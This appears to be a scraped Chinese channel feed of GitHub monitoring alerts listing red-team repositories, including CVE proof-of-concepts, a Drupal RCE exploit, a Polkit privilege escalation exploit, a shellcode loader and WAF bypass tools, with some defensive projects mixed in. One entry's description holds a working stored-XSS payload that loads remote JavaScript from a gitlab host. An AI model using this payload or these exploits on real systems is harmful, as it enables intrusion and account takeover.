📦 GitHub 全球红队渗透资源中转站。
旨在收录那些“好用却难找”的安全项目。
🔗 定时推送:GitHub Trending (Security)
🛠 必备清单:后渗透、远控、免杀、提权工具集
📅 更新频率:每日精选,绝不灌水。
⚠️ 本频道仅供安全研究与授权测试使用。
旨在收录那些“好用却难找”的安全项目。
🔗 定时推送:GitHub Trending (Security)
🛠 必备清单:后渗透、远控、免杀、提权工具集
📅 更新频率:每日精选,绝不灌水。
⚠️ 本频道仅供安全研究与授权测试使用。
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Ivanti #POC
📦 项目名称: ivanti-poc-loc
👤 项目作者: ionutzzu12
🛠 开发语言: MDX
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 07:25:43
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Ivanti #POC
📦 项目名称: ivanti-poc-loc
👤 项目作者: ionutzzu12
🛠 开发语言: MDX
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 07:25:43
📝 项目描述:
languages folder🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Sliver #C2
📦 项目名称: SharpADIDNS
👤 项目作者: RedteamNotes
🛠 开发语言: C#
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:53:26
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Sliver #C2
📦 项目名称: SharpADIDNS
👤 项目作者: RedteamNotes
🛠 开发语言: C#
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:53:26
📝 项目描述:
A C# CLI tool for reading and modifying AD-Integrated DNS records over LDAP, built for serious red teaming and packed with tradecraft features tailored for Sliver C2 execute-assembly.🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #RCE #POC
📦 项目名称: poc-tpl-rce
👤 项目作者: vulntestaj2-byte
🛠 开发语言: JavaScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:23:27
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #RCE #POC
📦 项目名称: poc-tpl-rce
👤 项目作者: vulntestaj2-byte
🛠 开发语言: JavaScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:23:27
📝 项目描述:
无描述🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Bypass #WAF
📦 项目名称: oxide-communityedtion-v8.5.0
👤 项目作者: HyperSecurityLabs
🛠 开发语言: Rust
⭐ Star数量: 4 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:51
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Bypass #WAF
📦 项目名称: oxide-communityedtion-v8.5.0
👤 项目作者: HyperSecurityLabs
🛠 开发语言: Rust
⭐ Star数量: 4 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:51
📝 项目描述:
OXIDE Framework v8.4.9 — AI-augmented web vulnerability scanner written in Rust. Features 15+ scanners (SQLi, XSS, LFI, CORS, TLS, creds, etc.), WAF bypass engine, ML-driven zero-day detection, Instagram OSINT, session hijack testing, async web crawler, and encrypted test database.🔗 点击访问项目地址
GitHub
GitHub - HyperSecurityLabs/oxide-communityedtion-v8.5.0: OXIDE Framework v8.5.0 — AI-augmented web vulnerability scanner written…
OXIDE Framework v8.5.0 — AI-augmented web vulnerability scanner written in Rust. Features 15+ scanners (SQLi, XSS, LFI, CORS, TLS, creds, etc.), WAF bypass engine, ML-driven zero-day detection, Ins...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Bypass #Sandbox
📦 项目名称: gdrive-upload-mcp
👤 项目作者: zenk-t-suzuki
🛠 开发语言: TypeScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:11
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Bypass #Sandbox
📦 项目名称: gdrive-upload-mcp
👤 项目作者: zenk-t-suzuki
🛠 开发语言: TypeScript
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 06:59:11
📝 项目描述:
MCP server on Cloudflare Workers that uploads files to your own Google Drive over plain HTTP — file bytes bypass JSON-RPC.🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20264893poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:33
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20264893poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:33
📝 项目描述:
Generate the poc for CVE-2026-4893: broken EDNS Client Subnet validation.🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20265172poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:05
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #CVE-2026 #POC
📦 项目名称: CVE20265172poc
👤 项目作者: lottiedeyan
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:56:05
📝 项目描述:
CVE-2026-5172: buffer overflow in extract_addresses() on crafted resource record PoC🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Sigma #SIEM
📦 项目名称: hybrid-ransomware-detection
👤 项目作者: vkmahalakshmi03
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:02:47
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Sigma #SIEM
📦 项目名称: hybrid-ransomware-detection
👤 项目作者: vkmahalakshmi03
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 05:02:47
📝 项目描述:
cybersecurity soc ransomware mitre-attack sigma threat-detection siem machine-learning python blue-team🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #Stored
📦 项目名称: sss
👤 项目作者: yonathandoss2017
🛠 开发语言: Unknown
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:42:33
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #Stored
📦 项目名称: sss
👤 项目作者: yonathandoss2017
🛠 开发语言: Unknown
⭐ Star数量: 1 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:42:33
📝 项目描述:
%%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"<script src=https://gitlab.com/cataha319/stored-xss/-/jobs/1460297351/artifacts/raw/payload.js> </script>\">'}}} }%% %%{init: { 'prototype': {'__proto__': {'template': '<iframe xmlns=\"http://www.w3.org/1999/xhtml\" srcdoc=\"<script src=https://gitlab.com/cataha319/stored-xss/-/jobs/1460297351/artifacts/raw/payload.js> </script>\">'}}} }%% sequenceDiagram Alice->>Bob: Hi Bob Bob->>Alice: Hi Alice🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #弱口令 #口令
📦 项目名称: mysql-weak-scan
👤 项目作者: lilu-yhl
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:16:26
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #弱口令 #口令
📦 项目名称: mysql-weak-scan
👤 项目作者: lilu-yhl
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 02:16:26
📝 项目描述:
Mysql弱口令扫描工具🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Shellcode #Loader #Evasion
📦 项目名称: Shellcode-Loader
👤 项目作者: ReversingID
🛠 开发语言: C++
⭐ Star数量: 280 | 🍴 Fork数量: 49
📅 更新时间: 2026-05-27 02:34:34
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Shellcode #Loader #Evasion
📦 项目名称: Shellcode-Loader
👤 项目作者: ReversingID
🛠 开发语言: C++
⭐ Star数量: 280 | 🍴 Fork数量: 49
📅 更新时间: 2026-05-27 02:34:34
📝 项目描述:
Open repository for learning dynamic shellcode loading (sample in many programming languages)🔗 点击访问项目地址
GitHub
GitHub - ReversingID/Shellcode-Loader: Open repository for learning dynamic shellcode loading (sample in many programming languages)
Open repository for learning dynamic shellcode loading (sample in many programming languages) - ReversingID/Shellcode-Loader
🚨 GitHub 监控消息提醒
🚨 发现关键词: #RCE #CVE
📦 项目名称: Drupal_REST-RCE_Unauthenticated
👤 项目作者: joaoaugustom
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 01:28:32
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #RCE #CVE
📦 项目名称: Drupal_REST-RCE_Unauthenticated
👤 项目作者: joaoaugustom
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 01:28:32
📝 项目描述:
This exploit is based on CVE-2019-6340 and was built upon the original exploit by leonjza and the Metasploit module, extending it can be executed multiple times against the same target without waiting for cache expiration.🔗 点击访问项目地址
GitHub
GitHub - joaoaugustom/Drupal_REST-RCE_Unauthenticated: This exploit is based on CVE-2019-6340 and was built upon the original exploit…
This exploit is based on CVE-2019-6340 and was built upon the original exploit by leonjza and the Metasploit module, extending it can be executed multiple times against the same target without wait...
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Exploit #CVE
📦 项目名称: CVE-2021-3560-exploit
👤 项目作者: Jeanback1
🛠 开发语言: Shell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 00:48:29
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Exploit #CVE
📦 项目名称: CVE-2021-3560-exploit
👤 项目作者: Jeanback1
🛠 开发语言: Shell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-27 00:48:29
📝 项目描述:
CVE-2021-3560 — Polkit privilege escalation exploit via accounts-daemon D-Bus race condition🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Nuclei #template #templates
📦 项目名称: GalSpec
👤 项目作者: jyshangguan
🛠 开发语言: Jupyter Notebook
⭐ Star数量: 5 | 🍴 Fork数量: 4
📅 更新时间: 2026-05-27 01:01:29
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Nuclei #template #templates
📦 项目名称: GalSpec
👤 项目作者: jyshangguan
🛠 开发语言: Jupyter Notebook
⭐ Star数量: 5 | 🍴 Fork数量: 4
📅 更新时间: 2026-05-27 01:01:29
📝 项目描述:
Spectral Analysis of Galaxy and Active galactic Nuclei🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #POC #Stored
📦 项目名称: Bludit-Exploitation
👤 项目作者: AnhNg1410
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 23:40:22
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #POC #Stored
📦 项目名称: Bludit-Exploitation
👤 项目作者: AnhNg1410
🛠 开发语言: Python
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 23:40:22
📝 项目描述:
PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate user privileges from Author to Administrator.🔗 点击访问项目地址
GitHub
GitHub - AnhNg1410/Bludit-Exploitation: PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate…
PoC script for Bludit CMS Privilege Escalation: Leveraging Stored XSS and CSRF to escalate user privileges from Author to Administrator. - AnhNg1410/Bludit-Exploitation
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Burp #Extension
📦 项目名称: kingfisher-burp-suite-extension
👤 项目作者: andrebhu
🛠 开发语言: Java
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:41:27
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Burp #Extension
📦 项目名称: kingfisher-burp-suite-extension
👤 项目作者: andrebhu
🛠 开发语言: Java
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:41:27
📝 项目描述:
Burp Suite extension for Kingfisher secret scanning🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #XSS #CVE
📦 项目名称: pocket-android-xss-0click-cve
👤 项目作者: FUNFACTOR1
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:56:15
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #XSS #CVE
📦 项目名称: pocket-android-xss-0click-cve
👤 项目作者: FUNFACTOR1
🛠 开发语言: Unknown
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 22:56:15
📝 项目描述:
0-click XSS (CWE-79) in Mozilla Pocket Android v8.33.0.0 via unsanitized $(document.body).html(content) in articleview-mobile.js. Background service triggers execution without user interaction. Java bridge exposed. Reported to Mozilla Security 2024-07-10. Won't Fix. CVE pending.🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #BlueTeam #Detection
📦 项目名称: vtscan
👤 项目作者: ibnaleem
🛠 开发语言: Go
⭐ Star数量: 3 | 🍴 Fork数量: 1
📅 更新时间: 2026-05-26 21:50:13
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #BlueTeam #Detection
📦 项目名称: vtscan
👤 项目作者: ibnaleem
🛠 开发语言: Go
⭐ Star数量: 3 | 🍴 Fork数量: 1
📅 更新时间: 2026-05-26 21:50:13
📝 项目描述:
🛡️ VirusTotal for the terminal🔗 点击访问项目地址
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Sigma #rules
📦 项目名称: sigma-ai
👤 项目作者: agentshield-ai
🛠 开发语言: Python
⭐ Star数量: 13 | 🍴 Fork数量: 1
📅 更新时间: 2026-05-26 20:47:34
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Sigma #rules
📦 项目名称: sigma-ai
👤 项目作者: agentshield-ai
🛠 开发语言: Python
⭐ Star数量: 13 | 🍴 Fork数量: 1
📅 更新时间: 2026-05-26 20:47:34
📝 项目描述:
Sigma detection rules for AI agent security monitoring🔗 点击访问项目地址
GitHub
GitHub - agentshield-ai/sigma-ai: Sigma detection rules for AI agent security monitoring
Sigma detection rules for AI agent security monitoring - agentshield-ai/sigma-ai
🚨 GitHub 监控消息提醒
🚨 发现关键词: #Exploit #CVE
📦 项目名称: -GodSearch
👤 项目作者: kikechans
🛠 开发语言: Shell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 20:01:20
📝 项目描述:
🔗 点击访问项目地址
🚨 发现关键词: #Exploit #CVE
📦 项目名称: -GodSearch
👤 项目作者: kikechans
🛠 开发语言: Shell
⭐ Star数量: 0 | 🍴 Fork数量: 0
📅 更新时间: 2026-05-26 20:01:20
📝 项目描述:
✨ Universal Exploit Search & Aggregator — THE SOVEREIGN. Búsqueda híbrida (Local/GitHub/Nuclei) con priorización CVE. 💀🔗 点击访问项目地址
GitHub
GitHub - kikechans/-GodSearch: ✨ Universal Exploit Search & Aggregator — THE SOVEREIGN. Búsqueda híbrida (Local/GitHub/Nuclei)…
✨ Universal Exploit Search & Aggregator — THE SOVEREIGN. Búsqueda híbrida (Local/GitHub/Nuclei) con priorización CVE. 💀 - kikechans/-GodSearch
